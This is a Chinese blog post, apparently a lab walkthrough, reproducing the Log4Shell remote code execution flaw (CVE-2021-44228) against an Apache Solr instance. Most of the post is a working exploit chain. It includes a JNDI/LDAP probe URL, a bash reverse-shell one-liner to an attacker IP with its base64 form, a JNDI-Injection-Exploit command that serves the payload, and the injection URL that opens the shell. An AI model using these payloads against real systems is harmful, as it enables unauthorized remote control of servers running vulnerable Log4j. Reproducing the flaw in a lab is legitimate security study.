log4j CVE-2021-44228 RCE漏洞复现

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值